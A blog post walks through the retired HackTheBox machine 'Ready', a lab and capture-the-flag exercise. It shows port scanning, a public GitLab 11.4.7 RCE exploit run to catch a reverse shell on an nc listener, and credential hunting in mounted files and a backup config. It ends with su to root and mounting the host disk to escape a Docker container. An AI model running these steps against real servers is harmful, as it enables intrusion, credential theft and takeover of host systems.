sábado, 5 de junio de 2021

HTB - Ready

For today we will break a retired and Medium HTB machine called Ready

You will learn basic linux and docker enumeration, we will take advantage of a  known gitlab vulnerability which will drive to a RCE


DESCRIPTION 

10.10.10.220 - Linux 


ENUMERATION


Port enumeration

We will start enumerating the 65535 TCP ports

nmap -p- --open -v -n 10.10.10.220 -oN ready_puertos -Pn --min-rate 100

PORT     STATE SERVICE

22/tcp   open  ssh

5080/tcp open  onscreen


Services basic enumeration

alter@kali:~/htb-vip/ready$ nmap -sC -sV -p22,5080 10.10.10.220 -oN ready_servicios

PORT     STATE SERVICE VERSION

22/tcp   open  ssh     OpenSSH 8.2p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0)

5080/tcp open  http    nginx

| http-robots.txt: 53 disallowed entries (15 shown)

| / /autocomplete/users /search /api /admin /profile 

| /dashboard /projects/new /groups/new /groups/*/edit /users /help 

|_/s/ /snippets/new /snippets/*/edit

| http-title: Sign in \xC2\xB7 GitLab

|_Requested resource was http://10.10.10.220:5080/users/sign_in

|_http-trane-info: Problem with XML parsing of /evox/about

Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel


The enumeration phase reveals the server is running GitLab


FOOTHOLD

There is a register funtionality available, so we can create an account and check the version

If we click on Help, we see GitLab Community Edition 11.4.7

GitLab version 11.4.7 suffers from a Remote Code Execution exploit listed with CVE-2018-19571 + CVE-2018-19585. 

We can find several PoC on Internet:

https://github.com/ctrlsam/GitLab-11.4.7-RCE

git clone https://github.com/ctrlsam/GitLab-11.4.7-RCE

alter@kali:~/htb-vip/ready/GitLab-11.4.7-RCE$ python exploit.py -u alter -p alter1234 -g http://10.10.10.220 -l 10.10.14.5 -P 443

[+] authenticity_token: iUyMjtGwLGI2ItYNR9rXajdNJmRiwRTaPr5/en+6CWiIeRBwa1v6oLAWb/zJEZnUAReCjOv1t8iQ3ootP0gntA==

[+] Creating project with random name: project1159

[+] Running Exploit

[+] Exploit completed successfully!

alter@kali:~/htb-vip/ready$ sudo nc -nlvp 443

[sudo] password for alter: 

listening on [any] 443 ...

connect to [10.10.14.5] from (UNKNOWN) [10.10.10.220] 46888

whoami

git


Get a interactive TTY

Script /dev/null -c bash

 Ctrl+Z, :

stty raw -echo;fg

reset

xterm

git@gitlab:~/gitlab-rails/working$ whoami

git


 user git is able to read the user.txt flag:

git@gitlab:/home/dude$ ls -la

total 24

drwxr-xr-x 2 dude dude 4096 Dec  7 16:58 .

drwxr-xr-x 1 root root 4096 Dec  2  2020 ..

lrwxrwxrwx 1 root root    9 Dec  7 16:58 .bash_history -> /dev/null

-rw-r--r-- 1 dude dude  220 Aug 31  2015 .bash_logout

-rw-r--r-- 1 dude dude 3771 Aug 31  2015 .bashrc

-rw-r--r-- 1 dude dude  655 May 16  2017 .profile

-r--r----- 1 dude git    33 Dec  2  2020 user.txt

git@gitlab:/home/dude$ cat user.txt 

e1e30b052b6ec0670698805d745e7682


PRIV ESCALATION

We start running lse.sh -l 1 to save time and get a whole view of  the system

The output reveals we are inside a Docker container, so it means we would need to escape from it.

git@gitlab:/dev/shm/$ bash lse.sh -l 1

ctn000 Are we in a docker container?................................... yes!

-rwxr-xr-x 1 root root 0 Dec  1  2020 /.dockerenv


We see the Docker host is exposing some folders into the container


git@gitlab:/dev/shm$ df -h

Filesystem      Size  Used Avail Use% Mounted on

overlay          18G   12G  6.0G  66% /

tmpfs            64M     0   64M   0% /dev

tmpfs           2.0G     0  2.0G   0% /sys/fs/cgroup

/dev/sda2        18G   12G  6.0G  66% /root_pass

shm              64M  756K   64M   2% /dev/shm

git@gitlab:/dev/shm$ cat /root_pass 

YG65407Bjqvv9A0a8Tm_7w

git@gitlab:/dev/shm$ su root

YG65407Bjqvv9A0a8Tm_7w

We check that password is not the container root password


/dev/sda2 looks like the  "/" docker host

so we need to mount the /dev/sda2  into our container in order to be able to access the Docker host folder structure


git@gitlab:/dev/shm$ mount /dev/sda2 /tmp/

mount: only root can do that


so we need get root in the container 


Enumerating a little bit more we find a password which allow us to get a root shell in the container:


git@gitlab:/opt/backup$ grep pass *

gitlab.rb:gitlab_rails['smtp_password'] = "wW59U!ZKMbG9+*#h"

su root 

git@gitlab:/opt/backup$ su root

Password: 

root@gitlab:/opt/backup# whoami

root

root@gitlab:/opt/backup#


Now we can run the mount command in order to mount the / docker host into our container:


root@gitlab:/opt/backup# mount /dev/sda2 /tmp/test/

root@gitlab:/opt/backup# cd /tmp/test/

root@gitlab:/tmp/test# ls

bin   cdrom  etc   lib    lib64   lost+found  mnt  proc  run   snap  sys  usr

boot  dev    home  lib32  libx32  media       opt  root  sbin  srv   tmp  var

root@gitlab:/tmp/test# cd root/

root@gitlab:/tmp/test/root# ls

docker-gitlab  ready-channel  root.txt  snap

root@gitlab:/tmp/test/root# cat root.txt 

b7f98681505cd39066f67147b103c2b3



Publicado por en
Etiquetas: , ,

No hay comentarios:

Publicar un comentario

Suscribirse a: Enviar comentarios (Atom)